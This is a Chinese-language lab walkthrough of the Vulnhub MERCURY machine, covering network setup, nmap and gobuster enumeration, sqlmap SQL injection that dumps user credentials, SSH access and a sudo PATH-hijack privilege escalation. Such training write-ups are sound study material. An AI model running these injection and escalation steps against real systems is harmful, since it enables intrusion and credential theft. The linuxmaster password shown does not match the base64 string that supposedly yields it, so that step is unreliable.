Vulnhub靶机实战:MERCURY提权全记录(附环境配置避坑指南)
Vulnhub靶机实战:MERCURY渗透全流程与网络配置避坑指南
在网络安全学习过程中,Vulnhub靶机因其丰富的实战场景和多样化的漏洞组合,成为安全爱好者提升技能的绝佳选择。MERCURY作为Vulnhub平台上的一款入门级靶机,虽然难度不高,但完整呈现了从信息收集到权限提升的标准渗透测试流程。本文将详细记录从环境搭建到最终提权的完整过程,特别针对VirtualBox与VMware网络兼容性问题提供解决方案,帮助初学者避开"照着教程做却连不上靶机"的常见陷阱。
1. 环境准备与网络配置
1.1 靶机下载与导入
MERCURY靶机可从Vulnhub官网获取,下载链接通常为OVA格式文件。需要注意的是,该靶机原生支持VirtualBox环境,若使用VMware Workstation导入可能会遇到网络适配问题。建议优先使用VirtualBox进行实验,若必须使用VMware,可尝试以下转换步骤:
# 将OVA转换为VMware兼容格式 ovftool Mercury.ova Mercury.vmx1.2 网络模式选择与互通配置
确保攻击机(Kali Linux)与靶机处于同一网络环境是渗透测试的前提。推荐采用NAT网络模式,具体配置要点如下:
VirtualBox设置:
- 全局设定 → 网络 → 添加NAT网络(如NatNetwork)
- 靶机网络设置 → 选择NAT网络 → 选择刚创建的NatNetwork
- Kali虚拟机同样选择该NatNetwork
VMware兼容方案:
1. 编辑虚拟机设置 → 网络适配器 → 自定义特定虚拟网络 2. 确保Kali和靶机选择相同的VMnet(通常为NAT模式下的相同VMnet) 3. 若仍无法互通,可尝试将靶机改为桥接模式
注意:完成配置后,建议在Kali中执行
ip addr show查看本机IP,然后使用arp-scan -l扫描同网段设备,确认靶机IP可达。
1.3 常见连接问题排查
当遇到网络不通时,可按以下步骤排查:
检查虚拟机网络适配器状态:
- VirtualBox:确保"启用网络连接"已勾选
- VMware:确认网络适配器已连接
验证IP分配:
# Kali中查看自身IP ifconfig eth0 # 扫描同网段主机 nmap -sn 192.168.56.0/24防火墙干扰排除:
- 临时关闭Kali防火墙:
sudo ufw disable - 检查靶机是否限制ICMP响应
- 临时关闭Kali防火墙:
2. 信息收集与漏洞扫描
2.1 主机发现与端口扫描
使用Nmap进行基础扫描是渗透测试的标准起点。针对MERCURY靶机,建议采用分层扫描策略:
# 快速存活检测 sudo nmap -sn 10.10.10.0/24 -oN host_scan.txt # 全端口扫描(TCP) sudo nmap -sT --min-rate 10000 -p- 10.10.10.6 -oN full_port.txt # 服务版本探测 sudo nmap -sT -sC -sV -O -p22,8080 10.10.10.6 -oN service_scan.txt # 漏洞脚本扫描 sudo nmap --script=vuln -p22,8080 10.10.10.6 -oN vuln_scan.txt扫描结果通常显示开放22(SSH)和8080(HTTP)端口。值得注意的是,8080端口运行的非标准Web服务,而是某种HTTP代理应用,这为后续渗透提供了方向。
2.2 Web应用目录枚举
当直接访问8080端口仅返回简单维护页面时,目录爆破成为必要手段。推荐使用Gobuster配合中等规模字典:
gobuster dir -u http://10.10.10.6:8080 \ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \ -x php,html,txt -o web_scan.txt若常规爆破无果,可尝试以下技巧:
- 修改HTTP请求头(如添加
X-Forwarded-For) - 尝试非常规文件扩展名(.bak, .swp等)
- 检查robots.txt或crossdomain.xml等标准文件
3. Web渗透与漏洞利用
3.1 非常规路径发现技巧
在目录爆破无果时,故意访问不存在的路径(如/aaa)可能触发应用报错,泄露有价值信息。MERCURY靶机正是通过这种方式暴露了隐藏的/mercuryfacts目录。这种技巧在实际渗透中尤为实用:
错误诱导法:
- 尝试
/admin,/test,/backup等常见但可能不存在的路径 - 观察错误页面是否泄露路径、框架信息
- 尝试
参数探测:
# 使用curl测试参数 curl -v "http://10.10.10.6:8080/mercuryfacts/1'"
3.2 SQL注入利用实战
当发现/mercuryfacts/1可能存在SQL注入时,可先用手动测试确认漏洞:
# 测试单引号触发错误 curl "http://10.10.10.6:8080/mercuryfacts/1'" # 测试布尔条件 curl "http://10.10.10.6:8080/mercuryfacts/1 and 1=1" curl "http://10.10.10.6:8080/mercuryfacts/1 and 1=2"确认存在注入后,使用sqlmap自动化利用:
# 获取数据库列表 sqlmap -u "http://10.10.10.6:8080/mercuryfacts/1" --dbms=mysql --dbs # 获取mercury数据库表结构 sqlmap -u "http://10.10.10.6:8080/mercuryfacts/1" --dbms=mysql -D mercury --tables # 导出users表数据 sqlmap -u "http://10.10.10.6:8080/mercuryfacts/1" --dbms=mysql -D mercury -T users --dump获取的凭据通常为以下格式:
| username | password |
|---|---|
| john | johnny1987 |
| webmaster | mercuryisthesizeof0.056Earths |
4. 权限提升与后渗透
4.1 初始访问与信息收集
使用获得的凭据通过SSH登录:
ssh webmaster@10.10.10.6 # 密码:mercuryisthesizeof0.056Earths登录后应立即开展信息收集:
- 检查家目录隐藏文件:
ls -la ~ - 查找SUID/GUID文件:
find / -perm -4000 2>/dev/null - 查看可写目录:
find / -writable 2>/dev/null - 检查计划任务:
crontab -l
4.2 横向移动技巧
在webmaster账户下发现notes.txt文件,内含疑似base64编码的凭据:
# 解码示例 echo 'bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==' | base64 -d获得linuxmaster账户凭据后,切换用户:
su linuxmaster # 密码:mercuryisthesizeof0.056Earths4.3 特权升级:环境变量劫持
关键步骤分解:
检查sudo权限:
sudo -l # 输出显示可运行/usr/bin/check_syslog.sh分析脚本内容:
cat /usr/bin/check_syslog.sh # 发现使用tail命令读取日志创建恶意软链接:
ln -s /bin/vi tail劫持PATH环境变量:
export PATH=.:$PATH执行提权:
sudo --preserve-env=PATH /usr/bin/check_syslog.sh # 进入vi后执行:!bash
5. 渗透测试中的思维训练
MERCURY靶机虽然技术难度不高,但完整呈现了渗透测试的标准思维流程。以下几点值得特别关注:
- 错误处理信息的价值:404页面可能泄露关键路径
- 开发者注释的重要性:See List页面暗示了数据库结构
- 最小权限原则的突破:从webmaster到linuxmaster的权限跃迁
- 环境变量攻击面:PATH滥用导致的权限提升
实际渗透中遇到的网络连接问题,往往比漏洞利用本身更耗时。建议初学者建立标准的排查清单:
- 虚拟机网络模式是否匹配(NAT/NAT网络)
- 防火墙规则是否阻止通信(iptables/ufw)
- IP地址是否在同一子网(ip addr show)
- 靶机服务是否正常监听(netstat -tulnp)
掌握这些基础问题的解决方法,才能将更多精力集中在真正的安全技术研究上。